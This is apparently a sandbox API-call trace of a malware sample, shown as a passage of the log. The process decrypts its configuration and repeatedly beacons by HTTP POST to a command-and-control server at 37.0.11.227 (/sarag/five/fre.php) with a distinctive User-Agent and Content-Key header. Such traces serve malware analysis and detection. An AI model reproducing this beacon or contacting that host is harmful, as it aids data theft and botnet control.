0x76ed0000 [0202.552] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0202.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.553] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0202.553] GetProcessHeap () returned 0x690000 [0202.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0202.553] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0202.554] GetProcessHeap () returned 0x690000 [0202.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0202.554] GetProcessHeap () returned 0x690000 [0202.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0202.554] GetProcessHeap () returned 0x690000 [0202.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0202.555] GetProcessHeap () returned 0x690000 [0202.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0202.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0202.623] GetProcessHeap () returned 0x690000 [0202.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0202.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.626] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0202.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.627] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.630] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.630] GetProcessHeap () returned 0x690000 [0202.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0202.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.632] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0202.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.633] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0202.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.634] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0202.634] GetProcessHeap () returned 0x690000 [0202.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0202.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.637] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0202.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.639] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0202.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.640] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0202.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.641] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0202.641] GetProcessHeap () returned 0x690000 [0202.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0202.641] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2e48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0202.641] GetProcessHeap () returned 0x690000 [0202.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0202.641] socket (af=2, type=1, protocol=6) returned 0x450 [0202.643] connect (s=0x450, name=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0202.687] FreeAddrInfoW (pAddrInfo=0x6b2e48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0202.687] GetProcessHeap () returned 0x690000 [0202.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0202.687] GetProcessHeap () returned 0x690000 [0202.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0202.687] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0202.698] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0202.698] GetProcessHeap () returned 0x690000 [0202.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0202.699] GetProcessHeap () returned 0x690000 [0202.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0202.699] GetProcessHeap () returned 0x690000 [0202.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0202.699] GetProcessHeap () returned 0x690000 [0202.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0202.700] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0202.700] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0202.700] GetProcessHeap () returned 0x690000 [0202.700] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0202.701] GetProcessHeap () returned 0x690000 [0202.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0202.701] send (s=0x450, buf=0x6abd08*, len=242, flags=0) returned 242 [0202.701] send (s=0x450, buf=0x6aba40*, len=159, flags=0) returned 159 [0202.701] GetProcessHeap () returned 0x690000 [0202.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0202.702] recv (in: s=0x450, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0202.777] GetProcessHeap () returned 0x690000 [0202.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0202.778] GetProcessHeap () returned 0x690000 [0202.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0202.778] GetProcessHeap () returned 0x690000 [0202.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0202.779] GetProcessHeap () returned 0x690000 [0202.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0202.779] closesocket (s=0x450) returned 0 [0202.780] GetProcessHeap () returned 0x690000 [0202.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0202.780] GetProcessHeap () returned 0x690000 [0202.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0202.780] GetProcessHeap () returned 0x690000 [0202.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0202.781] GetProcessHeap () returned 0x690000 [0202.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0202.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12e0) returned 0x450 [0202.783] Sleep (dwMilliseconds=0xea60) [0202.784] GetProcessHeap () returned 0x690000 [0202.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0202.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.787] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.792] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0202.846] GetProcessHeap () returned 0x690000 [0202.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0202.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.847] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0202.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.848] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.848] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.848] GetProcessHeap () returned 0x690000 [0202.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0202.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.850] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0202.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.850] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0202.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.851] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0202.851] GetProcessHeap () returned 0x690000 [0202.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0202.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.853] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0202.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.854] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0202.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.855] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0202.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.856] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0202.856] GetProcessHeap () returned 0x690000 [0202.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0202.856] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0202.856] GetProcessHeap () returned 0x690000 [0202.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0202.856] GetProcessHeap () returned 0x690000 [0202.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0202.857] GetProcessHeap () returned 0x690000 [0202.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0202.857] GetProcessHeap () returned 0x690000 [0202.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0202.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0202.873] GetProcessHeap () returned 0x690000 [0202.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0202.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.876] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0202.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.876] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.877] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.877] GetProcessHeap () returned 0x690000 [0202.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0202.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.879] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0202.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.879] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0202.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.880] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0202.880] GetProcessHeap () returned 0x690000 [0202.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0202.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.881] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0202.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.882] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0202.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.883] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0202.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.884] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0202.884] GetProcessHeap () returned 0x690000 [0202.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0202.884] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2a38*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0202.884] GetProcessHeap () returned 0x690000 [0202.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0202.884] socket (af=2, type=1, protocol=6) returned 0x454 [0202.884] connect (s=0x454, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0202.910] FreeAddrInfoW (pAddrInfo=0x6b2a38*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0202.910] GetProcessHeap () returned 0x690000 [0202.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0202.910] GetProcessHeap () returned 0x690000 [0202.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0202.911] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0202.912] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0202.912] GetProcessHeap () returned 0x690000 [0202.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0202.912] GetProcessHeap () returned 0x690000 [0202.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0202.912] GetProcessHeap () returned 0x690000 [0202.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0202.912] GetProcessHeap () returned 0x690000 [0202.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0202.913] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0202.913] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0202.913] GetProcessHeap () returned 0x690000 [0202.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0202.914] GetProcessHeap () returned 0x690000 [0202.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0202.914] send (s=0x454, buf=0x6abd08*, len=242, flags=0) returned 242 [0202.914] send (s=0x454, buf=0x6aba40*, len=159, flags=0) returned 159 [0202.915] GetProcessHeap () returned 0x690000 [0202.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0202.915] recv (in: s=0x454, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0202.998] GetProcessHeap () returned 0x690000 [0202.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0202.999] GetProcessHeap () returned 0x690000 [0202.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0202.999] GetProcessHeap () returned 0x690000 [0203.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0203.000] GetProcessHeap () returned 0x690000 [0203.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0203.000] closesocket (s=0x454) returned 0 [0203.001] GetProcessHeap () returned 0x690000 [0203.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0203.001] GetProcessHeap () returned 0x690000 [0203.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0203.001] GetProcessHeap () returned 0x690000 [0203.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.001] GetProcessHeap () returned 0x690000 [0203.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0203.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x440) returned 0x454 [0203.003] Sleep (dwMilliseconds=0xea60) [0203.005] GetProcessHeap () returned 0x690000 [0203.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0203.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.012] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0203.018] GetProcessHeap () returned 0x690000 [0203.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0203.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.019] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0203.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.020] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.021] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.021] GetProcessHeap () returned 0x690000 [0203.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0203.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.023] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0203.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.024] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0203.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.025] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0203.025] GetProcessHeap () returned 0x690000 [0203.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0203.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.026] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.027] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.028] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.030] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.030] GetProcessHeap () returned 0x690000 [0203.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0203.030] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.031] GetProcessHeap () returned 0x690000 [0203.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0203.035] GetProcessHeap () returned 0x690000 